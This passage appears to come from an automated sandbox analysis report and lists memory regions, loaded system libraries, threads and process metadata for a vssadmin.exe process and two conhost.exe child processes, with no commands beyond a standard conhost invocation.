pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 492 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 493 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 494 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 495 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 496 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 497 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 498 start_va = 0x7ff6ed990000 end_va = 0x7ff6ed9b7fff monitored = 0 entry_point = 0x7ff6ed9a3f60 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 499 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 506 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 507 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 508 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 509 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 510 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 511 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1049 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1050 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1051 start_va = 0x530000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1052 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1053 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1054 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1055 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1056 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1057 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1058 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1059 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1060 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1061 start_va = 0x7ff86d220000 end_va = 0x7ff86d23dfff monitored = 0 entry_point = 0x7ff86d223a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1080 start_va = 0x7ff870690000 end_va = 0x7ff8706a7fff monitored = 0 entry_point = 0x7ff870692000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1081 start_va = 0x7ff8706b0000 end_va = 0x7ff870831fff monitored = 0 entry_point = 0x7ff8706c82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1109 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1110 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1111 start_va = 0x630000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1112 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1113 start_va = 0x630000 end_va = 0x668fff monitored = 0 entry_point = 0x6312f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1114 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1115 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1116 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1117 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1118 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1119 start_va = 0x1f0000 end_va = 0x1fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 1120 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1121 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1125 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1126 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1127 start_va = 0x1de0000 end_va = 0x1f22fff monitored = 0 entry_point = 0x1e08210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1211 start_va = 0x1de0000 end_va = 0x1ebcfff monitored = 0 entry_point = 0x1e3e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1212 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1365 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1366 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1369 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1370 start_va = 0x1de0000 end_va = 0x1ebcfff monitored = 0 entry_point = 0x1e3e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1381 start_va = 0x1de0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 1382 start_va = 0x1e60000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1383 start_va = 0x1ee0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 1390 start_va = 0x1f60000 end_va = 0x203ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1927 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2007 start_va = 0x2140000 end_va = 0x253afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Thread: id = 14 os_tid = 0x10b0 Thread: id = 43 os_tid = 0x13a4 Thread: id = 45 os_tid = 0x11a4 Thread: id = 61 os_tid = 0xf24 Thread: id = 64 os_tid = 0x94c Thread: id = 65 os_tid = 0xed0 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x59954000" os_pid = "0x10e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x10a0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 512 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 513 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 514 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 515 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 516 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 517 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 518 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 519 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 520 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 521 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 522 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 523 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 524 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 525 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 526 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 527 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 528 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 529 start_va = 0x190000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 530 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 531 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 562 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 563 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 564 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 565 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 566 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 567 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 568 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 569 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 570 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 571 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 572 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 573 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 574 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 589 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 590 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 591 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 592 start_va = 0x6b0000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 593 start_va = 0x840000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 594 start_va = 0x1c40000 end_va = 0x1cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 612 start_va = 0x1c40000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 613 start_va = 0x1cb0000 end_va = 0x1cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 614 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 615 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 616 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 617 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 618 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 619 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 620 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 621 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 622 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 652 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 653 start_va = 0x1cc0000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 697 start_va = 0x1e70000 end_va = 0x21a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 698 start_va = 0x21b0000 end_va = 0x23c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 731 start_va = 0x23d0000 end_va = 0x25e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 732 start_va = 0x1cc0000 end_va = 0x1dcbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 733 start_va = 0x1e60000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 734 start_va = 0x25f0000 end_va = 0x2801fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 735 start_va = 0x2810000 end_va = 0x291afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 747 start_va = 0x1dd0000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 748 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 749 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 750 start_va = 0x2920000 end_va = 0x29dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 751 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 752 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 753 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 782 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1015 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1016 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1017 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1018 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1019 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1020 start_va = 0x590000 end_va = 0x594fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1021 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1022 start_va = 0x1c80000 end_va = 0x1c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 1023 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1033 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1034 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Thread: id = 15 os_tid = 0x10ec Thread: id = 17 os_tid = 0x1128 Thread: id = 20 os_tid = 0x4b8 Thread: id = 27 os_tid = 0x10fc Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4a2f1000" os_pid = "0x10f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x10ac" 